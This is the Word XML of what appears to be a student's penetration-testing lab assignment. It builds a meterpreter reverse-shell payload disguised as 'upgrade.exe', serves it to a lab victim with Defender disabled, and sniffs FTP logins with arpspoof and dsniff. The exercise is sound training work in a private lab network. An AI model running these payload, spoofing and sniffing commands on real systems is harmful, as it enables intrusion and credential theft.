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5F664" w14:textId="4F37E78E" w:rsidR="006858C7" w:rsidRDefault="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F76CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Assignment Day 6 | 30th August 2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E22F55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Question 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103EC359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 xml:space="preserve">● Create payload for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F76CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>windows .</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52D8DD49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Transfer the payload to the victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB2228" w14:textId="0699718B" w:rsid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Exploit the victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A59E1D" w14:textId="5326917C" w:rsidR="00F76CE3" w:rsidRDefault="00594B8D" w:rsidP="00F76CE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Commands :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="09A825EE" w14:textId="716FBD28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Attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC3F2A" w14:textId="1E308D6B" w:rsidR="00594B8D" w:rsidRPr="00594B8D" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00594B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00594B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00594B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00594B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00594B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00594B8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=10.0.2.15 LPORT=9999 -f exe -o upgrade.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADFB0B" w14:textId="78E4DF88" w:rsidR="00594B8D" w:rsidRP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service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F606F65" w14:textId="1C3EB037" w:rsidR="00594B8D" w:rsidRP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mv upgrade.exe /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAE4C1" w14:textId="4DBBE91E" w:rsidR="00594B8D" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CEB12CB" w14:textId="103B0822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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3C73C" w14:textId="50D3AF6D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payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63FDD04C" w14:textId="00E359BD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LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF64BED" w14:textId="6AA1EAE8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LPORT 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDC1D6" w14:textId="08AB150F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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653919B" w14:textId="27CAB006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Victim machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF8E74" w14:textId="6356DCF6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 xml:space="preserve">Open browser </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667B2A5" w14:textId="587702B6" w:rsidR="00594B8D" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.15/upgrade.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AFEC9C" w14:textId="222F88A4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 xml:space="preserve">Download the file and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before running it disable windows defender then run file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECFC4F" w14:textId="1CB68FAA" w:rsidR="006832D6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have successfully got</w:t>
      </w:r>
      <w:r w:rsidR="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006832D6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>our session in the attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1499D08D" w14:textId="22B22807" w:rsidR="00594B8D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7AA122" wp14:editId="6C3243CF">
            <wp:extent cx="6283586" cy="3086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96" cy="30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8D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B66205" w14:textId="15904210" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A430AD2" w14:textId="5902FE2B" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DD9654" w14:textId="4955BCE6" w:rsidR="006832D6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3CA5B5" wp14:editId="4018556E">
            <wp:extent cx="6396879" cy="31318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12" cy="31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288" w14:textId="02026007" w:rsidR="006832D6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F09FE1" wp14:editId="1737B0CE">
            <wp:extent cx="6259617" cy="30708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184" w14:textId="10EB4FB1" w:rsidR="00594B8D" w:rsidRDefault="00594B8D" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A74DD3D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Question 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10583E03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Create an FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244FAC31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Access FTP server from windows command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CFF0F" w14:textId="18990645" w:rsid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 xml:space="preserve">● Do an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>mitm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> and username and password of FTP transaction using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006832D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192516B" w14:textId="1B3451E4" w:rsidR="006832D6" w:rsidRDefault="006832D6" w:rsidP="006832D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7DA477" w14:textId="225C05A3" w:rsidR="006832D6" w:rsidRDefault="00F544AA" w:rsidP="006832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server manager in the machine in which we want to host the ftp server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266CF52C" w14:textId="1D802D1C" w:rsidR="00F544AA" w:rsidRDefault="00F544AA" w:rsidP="006832D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manage and select add roles and features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594F446A" w14:textId="1FE81D9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Click next until you reach server roles and in server roles </w:t>
      </w:r>
      <w:r w:rsidRPr="00F544AA">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">select web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F544AA">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Server(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F544AA">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IIS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D3488" w14:textId="717B2DA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Click next and then click install in the last screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D948F55" w14:textId="73AAEF55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Wait for installation to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC9746" w14:textId="68F50D55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In the other windows machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D5770" w14:textId="7818F870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Open command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>promt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check if both the machine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on the same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFC5C3" w14:textId="68128C78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Attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49234A" w14:textId="77777777" w:rsidR="00D738E9" w:rsidRDefault="00D738E9" w:rsidP="006832D6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA0AFD" w14:textId="77777777" w:rsidR="00D738E9" w:rsidRDefault="00D738E9" w:rsidP="006832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tab:&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0 -t 10.0.2.15 -r 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704943D8" w14:textId="77777777" w:rsidR="00D738E9" w:rsidRDefault="00D738E9" w:rsidP="006832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tab:&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3C657" w14:textId="1261AF3F" w:rsidR="00D738E9" w:rsidRDefault="00D738E9" w:rsidP="006832D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tab:&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D738E9">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE7C390" w14:textId="488CBB2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Doing ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5D5DC" w14:textId="67BD4275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Doing ftp in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>other</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A0F55" w14:textId="479C48D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In command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>promt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&gt;</w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00D738E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>ftp 10.0.2.15</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15569488" w14:textId="72C12E45" w:rsidR="00F544AA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Enter user as harry and P/W for harry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565161D" w14:textId="58C52703" w:rsidR="00F544AA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D3505C" wp14:editId="0408983E">
            <wp:extent cx="6103620" cy="434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71" cy="43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98A" w14:textId="12E03B8B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CEB77AC" wp14:editId="2734E7E1">
            <wp:extent cx="6312754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38" cy="32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006A" w14:textId="346F85FC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85714B" wp14:editId="41BC086A">
            <wp:extent cx="6293999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402" cy="3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EB64" w14:textId="45447BB6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06B9BD" wp14:editId="2D70A27F">
            <wp:extent cx="633339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96" cy="30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C49D" w14:textId="2DFF68BC" w:rsidR="00D738E9" w:rsidRPr="006832D6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61B8DB" wp14:editId="3B3FF03C">
            <wp:extent cx="633117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13" cy="31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29E7" w14:textId="77777777" w:rsidR="006832D6" w:rsidRPr="00594B8D" w:rsidRDefault="006832D6" w:rsidP="00F76CE3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006832D6" w:rsidRPr="005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1B"/>
    <w:rsid w:val="004A751B"/>
    <w:rsid w:val="00594B8D"/>
    <w:rsid w:val="006832D6"/>
    <w:rsid w:val="006858C7"/>
    <w:rsid w:val="00D738E9"/>
    <w:rsid w:val="00F544AA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9F9B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0E8E45F1-E7EB-4A9B-90E2-1691B24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2020-09-01T16:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-02T04:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>